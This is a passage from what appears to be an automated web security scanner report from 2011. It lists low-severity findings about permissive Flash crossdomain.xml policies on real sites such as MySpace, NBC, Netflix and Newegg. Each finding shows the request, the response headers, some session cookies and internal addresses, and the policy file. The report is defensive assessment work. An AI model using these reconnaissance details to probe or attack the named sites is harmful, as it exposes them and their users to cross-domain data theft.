<allow-access-from domain="*.minutemaid.com" secure="false"/>
...[SNIP]...
7.349. http://www.myheritage.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myheritage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myheritage.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.2.9 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Tue, 30 Nov 2010 16:11:51 GMT
ETag: "8c93c0-78c-7247dfc0"
Accept-Ranges: bytes
Content-Length: 1932
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:41:03 GMT
Connection: close
Cache-Control: max-age=86400
Expires: Tue, 22 Mar 2011 08:09:34 GMT

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.myheritagefiles.com"/>
   <allow-access-from domain="*.myheritageimages.com"/>
   <allow-access-from domain="*.myheritage.com"/>
   <allow-access-from domain="*.myheritageonline.com"/>
   <allow-access-from domain="*.mhcache.com"/>
   <allow-access-from domain="*.mhtools.com"/>
   <allow-access-from domain="*.myheritage.ae"/>
   <allow-access-from domain="*.myheritage.cn"/>
   <allow-access-from domain="*.myheritage.co.il"/>
   <allow-access-from domain="*.myheritage.co.in"/>
   <allow-access-from domain="*.myheritage.co.kr"/>
   <allow-access-from domain="*.myheritage.com.br"/>
   <allow-access-from domain="*.myheritage.com.hr"/>
   <allow-access-from domain="*.myheritage.com.pt"/>
   <allow-access-from domain="*.myheritage.com.tr"/>
   <allow-access-from domain="*.myheritage.com.ua"/>
   <allow-access-from domain="*.myheritage.cz"/>
   <allow-access-from domain="*.myheritage.de"/>
   <allow-access-from domain="*.myheritage.dk"/>    
   <allow-access-from domain="*.myheritage.es"/>
   <allow-access-from domain="*.myheritage.fr"/>
   <allow-access-from domain="*.myheritage.gr"/>
   <allow-access-from domain="*.myheritage.hu"/>
   <allow-access-from domain="*.myheritage.ir"/>
   <allow-access-from domain="*.myheritage.it"/>
   <allow-access-from domain="*.myheritage.jp"/>
   <allow-access-from domain="*.myheritage.lt"/>    
   <allow-access-from domain="*.myheritage.nl"/>
   <allow-access-from domain="*.myheritage.no"/>
   <allow-access-from domain="*.myheritage.pl"/>
   <allow-access-from domain="*.myheritage.ro"/>
   <allow-access-from domain="*.myheritage.rs"/>
   <allow-access-from domain="*.myheritage.sk"/>
   <allow-access-from domain="*.myheritage.si"/>
   <allow-access-from domain="*.myheritage.se"/>
   <allow-access-from domain="69.93.254.120"/>
   <allow-access-from domain="69.93.254.81"/>
   <allow-access-from domain="69.93.254.88"/>
...[SNIP]...
7.350. http://www.mylifetime.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mylifetime.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mylifetime.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 26 Aug 2010 05:20:42 GMT
ETag: "1118e1ad8-6c4-48eb328d23e80"
Cteonnt-Length: 1732
RealServer: prodweb5
Content-Type: text/xml
Cache-Control: no-store
Expires: Sat, 02 Apr 2011 13:35:19 GMT
Date: Sat, 02 Apr 2011 13:35:19 GMT
Content-Length: 1732
Connection: close

<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"/>
<allow-access-from domain="*.mylifetime.com" secure="false"/>
<allow-access-from domain="*.ltcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tremormedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="web1.lifetimetelevision.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="web2.lifetimetelevision.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="web3.lifetimetelevision.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.lovespringinternational.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dev.lovespringinternational.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb1.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb2.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb3.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb4.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb5.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb6.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb7.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb8.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="prodweb9.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="dev.lifetimetv.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.bunchball.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.natalie.feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.facebook.com" secure="false"/>
...[SNIP]...
7.351. http://www.myspace.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Expires: -1
Last-Modified: Thu, 31 Mar 2011 20:31:08 GMT
Accept-Ranges: bytes
ETag: "0ceba90e2efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: d1bdf6f06cd35da50a6e10c21d32924f35d6b802c52849dd
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634373194473101509&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Sat, 09-Apr-2011 12:37:27 GMT; path=/
Set-Cookie: SessionDDF2=I9TZrF+dXtP5q7zVPpjFdVpZctbsjZRwzVlHfD+hE2m3WIg8WOAefoUm5K+Uc7t62p94MdtQD98HE0BEH7VT5Q==; domain=.myspace.com; expires=Wed, 02-Apr-2031 12:37:27 GMT; path=/
X-PoweredBy: The Force
Date: Sat, 02 Apr 2011 12:37:27 GMT
Connection: keep-alive
Content-Length: 680
X-Vertical: profileidentities

<cross-domain-policy>
   <allow-access-from domain="*.fimservecdn.com" />
   <allow-access-from domain="lads.myspace.cn" />
   <allow-access-from domain="*.ilike.com" />
   <allow-http-request-headers-fro
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" />
   <allow-access-from domain="*.myspace.com" />
...[SNIP]...
7.352. http://www.myxer.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myxer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myxer.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:18 GMT
Server: Microsoft-IIS/7.0
Content-Type: text/xml
Last-Modified: Sat, 18 Jul 2009 09:06:49 GMT
Accept-Ranges: bytes
ETag: "80da2115877ca1:0"
X-UA-Compatible: IE=8
Content-Length: 363
Set-Cookie: SERVERID=PW06; path=/
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.myxer.com" />
   <allow-access-from domain="*.myxertones.com" />
   <allow-access-from domain="msbsfl.dyndns.org" />
<allow-access-from domain="*.mxr.cc" />
...[SNIP]...
7.353. http://www.myyearbook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myyearbook.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:54 GMT
Server: Apache
Last-Modified: Mon, 28 Sep 2009 08:13:22 GMT
ETag: "79e4f3-570-4749edf02cc80"
Accept-Ranges: bytes
Content-Length: 1392
X-Server-Name: web27
Connection: close
Content-Type: text/x-cross-domain-policy
X-MyPoolMember: 10.100.10.77

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*.myyearbook.com"/>
   <allow-access-from domain="*.mybdev.com"/>
   <allow-access-from domain="*.mybstaff.com"/>
   <allow-access-from domain="*.coolapps.com"/>
   <allow-access-from domain="*.mybcdna.com"/>
   <allow-access-from domain="*.mybcdnb.com"/>
   <allow-access-from domain="*.mybcdnc.com"/>
   <allow-access-from domain="*.mybcdnd.com"/>
   <allow-access-from domain="*.mybcdne.com"/>
   <allow-access-from domain="*.mybcdnf.com"/>
...[SNIP]...
7.354. http://www.nascar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nascar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nascar.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:01 GMT
Server: Apache
Last-Modified: Sat, 05 Jun 2010 16:12:55 GMT
Accept-Ranges: bytes
Content-Length: 819
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.nascar.com" />
<allow-access-from domain="*.sportvision.com" />
<allow-access-from domain="*.cnn.com" />
<allow-access-from domain="*.turner.com" />
<allow-access-from domain="*.cnn.net" />
<allow-access-from domain="*.fedex.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.toptrumps.com"/>
<allow-access-from domain="*.toptrumpslive.com"/>
<allow-access-from domain="*.officedepotracing.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="cdn.eyewonder.com"/>
<allow-access-from domain="cdn1.eyewonder.com"/>
<allow-access-from domain="apps.eyewonderlabs.com"/>
...[SNIP]...
7.355. http://www.nationalgeographic.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nationalgeographic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nationalgeographic.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Length: 1633
Xonnection: Xeep-Alive
Content-Type: text/xml
X-Cache-Lookup: HIT from rpc4.int.ngeo.com:80
Cache-Control: max-age=9401
Expires: Sat, 02 Apr 2011 16:04:18 GMT
Date: Sat, 02 Apr 2011 13:27:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.extremeexplorer.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ngm.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ngm.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nationalgeographic.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ngm.typepad.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.google.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thegreenguide.com" secure="false" />
...[SNIP]...
<allow-access-from domain="thegreenguide.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nationalgeographic.co.uk" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nationalgeographic.co.in" secure="false" />
...[SNIP]...
<allow-access-from domain="*.nationalgeographic.com.au" secure="false" />
...[SNIP]...
<allow-access-from domain="*.tremormedia.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ngeo.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="u23dmovie.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.u23dmovie.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fieldscope.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fieldscope.us" secure="false" />
...[SNIP]...
7.356. http://www.nba.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nba.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 20 Dec 2010 20:43:32 GMT
Accept-Ranges: bytes
Content-Length: 2010
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:25:13 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.turner.com" />
   <allow-access-from domain="*.nba.com" />
   <allow-access-from domain="*.wnba.com" />
   <allow-access-from domain="*.airplay.com" />
   <allow-access-from domain="*.apnwi.com" />
   <allow-access-from domain="*.codeandtheory.com" />
   <allow-access-from domain="*.equakecreative.com" />    
   <allow-access-from domain="*.equakecreative2.com" />    
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="*.gmodules.com" />
   <allow-access-from domain="*.gsipartners.com" />
   <allow-access-from domain="*.gspt.net" />
   <allow-access-from domain="*.iamatrailblazersfan.com" />
   <allow-access-from domain="*.jivesoftware.com" />
   <allow-access-from domain="*.liveworld.com" />
   <allow-access-from domain="*.myspace.com" />
   <allow-access-from domain="*.nike.com" />
   <allow-access-from domain="nba.goodbysilverstein.com" />
   <allow-access-from domain="*.onebowerman.com" />
   <allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.radassembly.com" />
   <allow-access-from domain="search.atomz.com" />
   <allow-access-from domain="*.synergymedia.net" />
   <allow-access-from domain="*.toptrumps.com" />
   <allow-access-from domain="*.toptrumpslive.com" />
   <allow-access-from domain="*.trinityeffects.com" />
   <allow-access-from domain="*.yinteract.com" />
<allow-access-from domain="*.tnt.tv" />
<allow-access-from domain="*.imageg.net" />
<allow-access-from domain="*.dickssportinggoods.com" />
<allow-access-from domain="*.eloqua.com" />
<allow-access-from domain="*.mycavsaccount.com" />
<allow-access-from domain="*.cavfanatic.com" />
<allow-access-from domain="*.attractv.net" />
<allow-access-from domain="*.nbahooptroop.com" />
<allow-access-from domain="127.0.0.1"/>
...[SNIP]...
7.357. http://www.nbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nbc.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Last-Modified: Tue, 21 Sep 2010 17:56:56 GMT
ETag: "36701c4-bbc-490c8c1324a00"
Accept-Ranges: bytes
Content-Length: 3004
Wirt: (null)
Content-Type: application/xml
Cache-Control: max-age=5
Expires: Sat, 02 Apr 2011 13:24:33 GMT
Date: Sat, 02 Apr 2011 13:24:28 GMT
Connection: close
Set-Cookie: ak-mobile-true=no; expires=Sun, 03-Apr-2011 13:24:28 GMT; path=/
Vary: User-Agent

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="boards.nbc.com" />
<allow-access-from domain="blogs.nbc.com" />
<allow-access-from domain="*.nbc.com" />
<allow-access-from domain="*.samantha48616e61.com" />
<allow-access-from domain="chuckssecret.com" />
<allow-access-from domain="www.gold4sex.com" />
<allow-access-from domain="www.chuckssecret.com" />
<allow-access-from domain="itm2083.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="biggestloser.msn.com" />
<allow-access-from domain="*.nbcuni.com" />
<allow-access-from domain="www.biggestloser.msn.com" />
<allow-access-from domain="swf.userplane.com" />
<allow-access-from domain="*.clearspring.com" />
<allow-access-from domain="*.ingaylewetrust.com" />
<allow-access-from domain="external.admin.nbc.nbcuni.com" />
<allow-access-from domain="127.0.0.1" />
<allow-access-from domain="localhost" />
<allow-access-from domain="*.theparenthoodproject.com" headers="*"/>
<allow-access-from domain="*.jaylenosgarage.com" headers="*"/>
<allow-access-from domain="*.dundermifflininfinity.com" headers="*"/>
<allow-access-from domain="*.ingaylewetrust.com" headers="*"/>
<allow-access-from domain="*.latenightwithjimmyfallon.com" headers="*"/>
<allow-access-from domain="*.msn.com" headers="*"/>
<allow-access-from domain="*.yahoo.com" headers="*"/>
<allow-access-from domain="*.unicast.com" headers="*"/>
<allow-access-from domain="*.nbcagencywc4.com" headers="*"/>
<allow-access-from domain="*.themoreyouknow.com" headers="*"/>
<allow-access-from domain="*.adinterax.com"/>
<allow-access-from domain="*.dialstar.tv"/>
<allow-access-from domain="*.truthseeker5314.com"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure=" false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure=" false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure=" false"/>
...[SNIP]...
7.358. http://www.nbcnewyork.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nbcnewyork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nbcnewyork.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 02 Apr 2011 06:18:47 GMT
X-Server-Name: sj-c14-r3-u6
Content-Type: text/xml;charset=utf-8
Date: Sat, 02 Apr 2011 14:16:18 GMT
Content-Length: 1129
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.nbcbayarea.com"/>
<allow-access-from domain="*.nbcchicago.com"/>
<allow-access-from domain="*.nbcconnecticut.com"/>
<allow-access-from domain="*.nbcdfw.com"/>
<allow-access-from domain="*.nbclosangeles.com"/>
<allow-access-from domain="*.nbcmiami.com"/>
<allow-access-from domain="*.nbcnewyork.com"/>
<allow-access-from domain="*.nbcphiladelphia.com"/>
<allow-access-from domain="*.nbcsandiego.com"/>
<allow-access-from domain="*.nbcwashington.com"/>
<allow-access-from domain="*.nbclocalmedia.com"/>
<allow-access-from domain="*.theplatform.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.ftp.clickability.com"/>
<allow-access-from domain="widgets.nbcuni.com"/>
<allow-access-from domain="services.weatherplus.com"/>
<allow-access-from domain="*.thefeast.com"/>
<allow-access-from domain="*.client-projects.com"/>
<allow-access-from domain="*.edgecastcdn.net"/>
<allow-access-from domain="*.thelocalfeast.com"/>
<allow-access-from domain="*.2mdn.net"/>
...[SNIP]...
7.359. http://www.netflix.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.netflix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netflix.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:47 GMT
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR DEVa TAIa OUR BUS UNI STA"
Cache-Control: private
Pragma: no-cache
Expires: Fri, 01 Apr 2011 12:43:47 GMT
Last-Modified: Thu, 24 Mar 2011 13:33:18 GMT
Content-Type: application/xml;charset=UTF-8
Content-Length: 89
Set-Cookie: VisitorId=002~bd8992b8-0627-47a7-8f99-633d2f1f6da5~1301748227374~true~1301748227374; Domain=.netflix.com; Expires=Sun, 01-Apr-2012 12:43:47 GMT; Path=/
Set-Cookie: nflxsid=222.1301748227374; Domain=.netflix.com; Path=/
Set-Cookie: NetflixSession=222.792c5260-5137-49ae-a7d7-b71c75cdef3d; Domain=.netflix.com; Path=/
Set-Cookie: vstCnt=1~1~1301723027392; Domain=.netflix.com; Expires=Sun, 01-Apr-2012 12:43:47 GMT; Path=/
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=66
Connection: Keep-Alive
Set-Cookie: NSC_ED2-xxx=ffffffff09cc3e6b45525d5f4f58455e445a4a422d69;path=/;domain=netflix.com;httponly

<cross-domain-policy>
<allow-access-from domain="*.netflix.com"/>
</cross-domain-policy>
7.360. http://www.newegg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newegg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newegg.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 02 Dec 2009 00:20:07 GMT
ETag: "e8c1e633e572ca1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
x-server-id: 110
X-UA-Compatible: IE=7
Content-Length: 265
Date: Sat, 02 Apr 2011 13:40:39 GMT
Age: 0
Connection: keep-alive
X-Served-By: E401
X-Ver: 11030801
X-Cache: MISS
X-Cache-Hits: 0
Set-Cookie: NSC_xxx.ofxfhh.dpn-WJQ=ffffffffaf18326045525d5f4f58455e445a4a4229a1;expires=Sat, 02-Apr-2011 14:35:27 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newegg.com" />
<allow-access-from domain="*.newegg.ca" />
...[SNIP]...
7.361. http://www.newport-news.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newport-news.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newport-news.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Tue, 09 Mar 2010 18:43:28 GMT
ETag: "47f4cb68b8bfca1:1329"
Content-Length: 385
Date: Sat, 02 Apr 2011 13:56:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domainpolicy.dtd">
<cross-domain-policy>
   <allow-access-from domain="pm.allurent.net"/>
   <allow-access-from domain="*.pm.allurent.net"/>
   <allow-access-from domain="*.shared.allurent.net"/>
   <allow-access-from domain="*.newport-news.com.allurent.net"/>
...[SNIP]...
7.362. http://www.newsvine.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:28 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=993
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...
7.363. http://www.newsweek.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newsweek.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

